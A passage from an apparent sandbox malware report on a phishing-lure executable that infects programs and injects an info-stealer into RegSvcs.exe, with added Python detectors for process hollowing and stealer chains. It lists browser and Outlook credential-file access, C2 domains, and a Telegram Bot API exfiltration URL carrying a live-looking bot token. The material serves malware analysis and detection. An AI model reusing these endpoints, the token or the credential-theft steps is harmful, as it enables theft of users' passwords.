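if __name__ == "__main__":
    for f in detect_hollowing(REPORT_EVENTS):
        print(f"{ntpath.basename(f.source)} -> {ntpath.basename(f.target)} (score {f.score})")
        for r in f.reasons:
            print("  -", r)
```

The benign control (explorer.exe starting notepad.exe) produces no finding because the command line names the same image as the child and nothing writes into the child afterwards. On a live host the first and third reasons correspond to Sysmon Event ID 1 (Image versus CommandLine mismatch) and Event ID 10 (ProcessAccess with write rights); the RWX section map needs EDR or ETW telemetry rather than Sysmon.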

                  Stealing of Sensitive Information

Source: Yara match | File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR

Source: Yara match | File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match | File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR

Source: Yara match | File source: 17.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7188, type: MEMORYSTR
MITRE ATT&CK Matrix (digits in front of a technique name are the report's count badges, reproduced as rendered; cells without a badge are the matrix's default technique names, not observed behaviour)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 2 LSASS Driver | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 2 LSASS Driver | 1 Abuse Elevation Control Mechanism | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 212 Process Injection | 1 Software Packing | NTDS | 113 System Information Discovery | Distributed Component Object Model | 11 Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 211 Security Software Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 222 Masquerading | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 212 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph

Behavior Graph ID: 1572924 | Sample: HSBC Payment Notification S... | Start date: 11/12/2024 | Architecture: WINDOWS | Score: 100

Bracketed numbers after a process name are the per-process counters drawn in the graph, reproduced as rendered.

Sample (root node)
  DNS/IP: reallyfreegeoip.org; api.telegram.org; 21 other IPs or domains
  Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 14 other signatures
  Started processes: armsvc.exe [1]; HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe [3]; elevation_service.exe; 18 other processes
  reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
  api.telegram.org: Uses the Telegram API (likely for C&C communication)

armsvc.exe
  DNS/IP: ww99.przvgke.biz 72.52.179.174 (ports 49713, 80; LIQUIDWEBUS; United States); lpuegx.biz 82.112.184.197 (ports 49742, 49792, 49844; FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU; Russian Federation); 7 other IPs or domains
  Dropped: C:\Windows\System32\wbengine.exe (PE32+); C:\Windows\System32\wbem\WmiApSrv.exe (PE32+); C:\Windows\System32\vds.exe (PE32+); 126 other malicious files
  Signatures: Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)

HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
  Dropped: C:\Windows\System32\msiexec.exe (PE32+); C:\Windows\System32\msdtc.exe (PE32+); C:\Windows\System32\alg.exe (PE32+); 12 other malicious files
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  Started processes: RegSvcs.exe [15, 2]

elevation_service.exe
  Signatures: Found direct / indirect Syscall (likely to bypass EDR)

18 other processes
  Signatures: Creates files inside the volume driver (system volume information); Contains functionality to behave differently if execute on a Russian/Kazak computer

RegSvcs.exe
  DNS/IP: api.telegram.org 149.154.167.220 (ports 443, 49716; TELEGRAMRU; United Kingdom); checkip.dyndns.com 193.122.6.168 (ports 49709, 80; ORACLE-BMC-31898US; United States); reallyfreegeoip.org 172.67.177.134 (ports 443, 49711; CLOUDFLARENETUS; United States)
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
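The credential-store access listed under Stealing of Sensitive Information (the Chrome and Edge "Login Data" files and the Outlook MAPI profile key, all opened by RegSvcs.exe) and the network nodes attached to RegSvcs.exe in the behavior graph (checkip.dyndns.com, reallyfreegeoip.org, api.telegram.org) together form the stealer chain the report's signatures describe. The following Python is an added example for this page, not code from the report: it scores file, registry and network events per process and reports a process once at least two of the three stages are present. The path and key patterns, the allow-lists and the two extra IP-lookup hosts (api.ipify.org, ip-api.com) are the example's own assumptions; the events embedded are modelled on this report's lines, plus a constructed benign control.

```python
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, List

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Events modelled on this report's "File opened", "Key opened" and behavior-graph
# network lines for RegSvcs.exe (field names are this example's own).
REPORT_EVENTS = [
    {"kind": "file_open", "process": REGSVCS,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "file_open", "process": REGSVCS,
     "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"kind": "reg_open", "process": REGSVCS,
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"kind": "net_connect", "process": REGSVCS, "host": "checkip.dyndns.com", "port": 80},
    {"kind": "net_connect", "process": REGSVCS, "host": "reallyfreegeoip.org", "port": 443},
    {"kind": "net_connect", "process": REGSVCS, "host": "api.telegram.org", "port": 443},
]
# Constructed benign control: the browser reading its own store and doing a geolocation lookup.
CONTROL_EVENTS = [
    {"kind": "file_open", "process": CHROME,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "net_connect", "process": CHROME, "host": "reallyfreegeoip.org", "port": 443},
]

# Credential stores touched in the report: Chromium "Login Data" and the Outlook MAPI
# profile key. Patterns and owner allow-list are this example's assumptions.
CRED_FILE_RE = re.compile(r"\\User Data\\[^\\]+\\Login Data$", re.IGNORECASE)
CRED_KEY_RE = re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.IGNORECASE)
CRED_OWNERS = {"chrome.exe", "msedge.exe", "outlook.exe"}
# Public-IP / geolocation services from the report, plus two commonly used in the same
# role (assumed additions, not from this report).
IP_LOOKUP_HOSTS = {"checkip.dyndns.com", "reallyfreegeoip.org", "api.ipify.org", "ip-api.com"}
TELEGRAM_API = "api.telegram.org"


@dataclass
class StealerFinding:
    process: str
    stages: Dict[str, List[str]] = field(default_factory=lambda: {
        "credential_access": [], "victim_profiling": [], "telegram_api": []})

    @property
    def stage_count(self) -> int:
        return sum(1 for v in self.stages.values() if v)

    @property
    def verdict(self) -> str:
        s = self.stages
        if s["credential_access"] and s["victim_profiling"] and s["telegram_api"]:
            return "credential theft, victim profiling and Telegram Bot API contact (stealer chain)"
        return "partial chain: " + ", ".join(k for k, v in s.items() if v)


def score_stealer_chain(events: List[dict],
                        allow_telegram: FrozenSet[str] = frozenset()) -> List[StealerFinding]:
    """Group events by process and return every process showing two or more stages.
    allow_telegram names processes (lower-case image names) permitted to use the Bot API."""
    by_proc: Dict[str, StealerFinding] = {}

    def f(proc: str) -> StealerFinding:
        return by_proc.setdefault(proc, StealerFinding(proc))

    for e in events:
        proc = e["process"]
        name = ntpath.basename(proc).lower()
        if e["kind"] == "file_open" and CRED_FILE_RE.search(e["path"]) and name not in CRED_OWNERS:
            f(proc).stages["credential_access"].append(e["path"])
        elif e["kind"] == "reg_open" and CRED_KEY_RE.search(e["key"]) and name not in CRED_OWNERS:
            f(proc).stages["credential_access"].append(e["key"])
        elif e["kind"] == "net_connect":
            host = e["host"].lower()
            if host in IP_LOOKUP_HOSTS:
                f(proc).stages["victim_profiling"].append(host)
            elif host == TELEGRAM_API and name not in allow_telegram:
                f(proc).stages["telegram_api"].append(f"{host}:{e['port']}")
    return [x for x in by_proc.values() if x.stage_count >= 2]


if __name__ == "__main__":
    for x in score_stealer_chain(REPORT_EVENTS + CONTROL_EVENTS):
        print(f"{ntpath.basename(x.process)}: {x.verdict}")
        for stage, items in x.stages.items():
            if items:
                print(f"  {stage}: {', '.join(items)}")
```

api.telegram.org is the HTTP Bot API endpoint; the Telegram desktop client talks MTProto to the data centres rather than to this host, so an ordinary endpoint process reaching it deserves a look on its own, which is why the example still reports a process that shows credential access plus a Telegram connection without the IP lookup. The allow_telegram parameter is for an estate that runs its own alerting bot; leave it empty otherwise. The browser control is not reported because the store it reads is its own and a single geolocation lookup is one stage, not two.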

Source | Detection | Scanner | Label
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | 82% | ReversingLabs | Win32.Virus.Expiro
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | 100% | Avira | W32/Infector.Gen
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Avira | W32/Infector.Gen |
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | 100% | Joe Sandbox ML | |
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
ww99.przvgke.biz | 15% | Virustotal | | Browse
ww12.przvgke.biz | 16% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://82.112.184.197/dtxqcr | 0% | Avira URL Cloud | safe |
http://18.141.10.107/4 | 0% | Avira URL Cloud | safe |
http://ww12.przvgke.biz/d | 100% | Avira URL Cloud | malware |
http://172.234.222.138/C | 0% | Avira URL Cloud | safe |
http://ww99.przvgke.biz/ | 100% | Avira URL Cloud | malware |
http://ww99.przvgke.biz/iwsxa | 100% | Avira URL Cloud | malware |
http://ww12.przvgke.biz/T | 100% | Avira URL Cloud | malware |
http://54.244.188.177/yfypviummaqwyuq | 0% | Avira URL Cloud | safe |
http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662ww99.przvgke.bizc | 100% | Avira URL Cloud | malware |
http://ww99.przvgke.biz/7Ycs | 100% | Avira URL Cloud | malware |
http://54.244.188.177:80/yfypviummaqwyuq | 0% | Avira URL Cloud | safe |
http://44.221.84.105/gjuvotllw | 0% | Avira URL Cloud | safe |
http://18.141.10.107/feiwbqpqckjc | 0% | Avira URL Cloud | safe |
https://api.telegram | 0% | Avira URL Cloud | safe |
http://ww12.przvgke.biz/iwsxa?usid=25&utid=8132645662 | 100% | Avira URL Cloud | malware |
http://schemas.micrXX | 0% | Avira URL Cloud | safe |
http://ww12.przvgke.biz/L | 100% | Avira URL Cloud | malware |
http://ww12.przvgke.biz/snsobwmcccpnrm?usid=25&utid=8132647334 | 100% | Avira URL Cloud | malware |
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTZ8fHx8fHw2NzU5NGNhZTNm | 100% | Avira URL Cloud | malware |
http://82.112.184.197/U | 0% | Avira URL Cloud | safe |
http://82.112.184.197/dtxqcr | 7% | Virustotal | | Browse
http://54.244.188.177/ihnlsqbtrmkahnv | 0% | Avira URL Cloud | safe |
http://18.141.10.107/jji | 0% | Avira URL Cloud | safe |
http://172.234.222.138/J | 0% | Avira URL Cloud | safe |
http://ww99.przvgke.biz/ | 15% | Virustotal | | Browse
http://18.141.10.107/b | 0% | Avira URL Cloud | safe |
http://44.221.84.105/b | 0% | Avira URL Cloud | safe |
http://82.112.184.197/kdexhblwxghmjgif | 0% | Avira URL Cloud | safe |
http://172.234.222.138/snsobwmcccpnrm | 0% | Avira URL Cloud | safe |
http://172.234.222.138/U | 0% | Avira URL Cloud | safe |
http://82.112.184.197/kdexhblwxghmj | 0% | Avira URL Cloud | safe |
http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid | 0% | Avira URL Cloud | safe |
http://ww12.przvgke.biz/ | 100% | Avira URL Cloud | malware |
http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTd8fHx8fHw2NzU5NGNiMGMw | 100% | Avira URL Cloud | malware |
http://ww99.przvgke.biz/snsobwmcccpnrm | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
przvgke.biz | 172.234.222.138 | true | false | | high
ssbzmoy.biz | 18.141.10.107 | true | false | | high
knjghuig.biz | 18.141.10.107 | true | false | | high
vjaxhpbji.biz | 82.112.184.197 | true | false | | high
pywolwnvd.biz | 54.244.188.177 | true | false | | high
reallyfreegeoip.org | 172.67.177.134 | true | false | | high
ifsaia.biz | 13.251.16.150 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
cvgrf.biz | 54.244.188.177 | true | false | | high
ww99.przvgke.biz | 72.52.179.174 | true | false | | unknown
lpuegx.biz | 82.112.184.197 | true | false | | high
saytjshyf.biz | 44.221.84.105 | true | false | | high
084725.parkingcrew.net | 13.248.148.254 | true | false | | high
xlfhhhm.biz | 47.129.31.212 | true | false | | high
fwiwk.biz | 172.234.222.143 | true | false | | high
vcddkls.biz | 18.141.10.107 | true | false | | high
npukfztj.biz | 44.221.84.105 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
zlenh.biz | unknown | unknown | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
uhxqin.biz | unknown | unknown | false | | high
ww12.przvgke.biz | unknown | unknown | true | | unknown
anpmnmxo.biz | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.175 | false | | high
http://vjaxhpbji.biz/cfsmnhjm | false | | high
http://ifsaia.biz/pn | false | | high
http://saytjshyf.biz/eglmpsrvxnyx | false | | high
http://npukfztj.biz/gjuvotllw | false | | high
http://xlfhhhm.biz/vtfq | false | | high
http://vcddkls.biz/lqpvpf | false | | high
http://checkip.dyndns.org/ | false | | high
http://vjaxhpbji.biz/o | false | | high
http://cvgrf.biz/yfypviummaqwyuq | false | | high
http://lpuegx.biz/dtxqcr | false | | high
http://ssbzmoy.biz/jji | false | | high
https://reallyfreegeoip.org/xml/8.46.123.175 | false | | high
http://pywolwnvd.biz/taohikdratudiqxk | false | | high
http://pywolwnvd.biz/ihnlsqbtrmkahnv | false | | high
http://knjghuig.biz/feiwbqpqckjc | false | | high
http://przvgke.biz/iwsxa | false | | high
http://ssbzmoy.biz/xxitmchctwqm | false | | high
http://przvgke.biz/snsobwmcccpnrm | false | | high
http://lpuegx.biz/kdexhblwxghmj | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://ww99.przvgke.biz/ | armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | 15%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://api.telegram.org | RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | RegSvcs.exe, 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613 | RegSvcs.exe, 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881 | armsvc.exe, 00000002.00000003.2776258063.00000000007C0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://ww12.przvgke.biz/d | armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://18.141.10.107/4 | armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://172.234.222.138/C | armsvc.exe, 00000002.00000003.2288760056.0000000000974000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://18.141.10.107/ | armsvc.exe, 00000002.00000003.2148425780.0000000000974000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2329946680.0000000000974000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://82.112.184.197/dtxqcr | armsvc.exe, 00000002.00000003.2555995836.000000000098F000.00000004.00000020.00020000.00000000.sdmp | false | 7%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://www.openssl.org/support/faq.html | officesvcmgr.exe.2.dr | false | | high
http://ww99.przvgke.biz/iwsxa | armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2689707776.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2555537491.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://ww12.przvgke.biz/T | armsvc.exe, 00000002.00000003.2331664553.000000000099F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2290002010.000000000098F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2331182641.000000000098F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
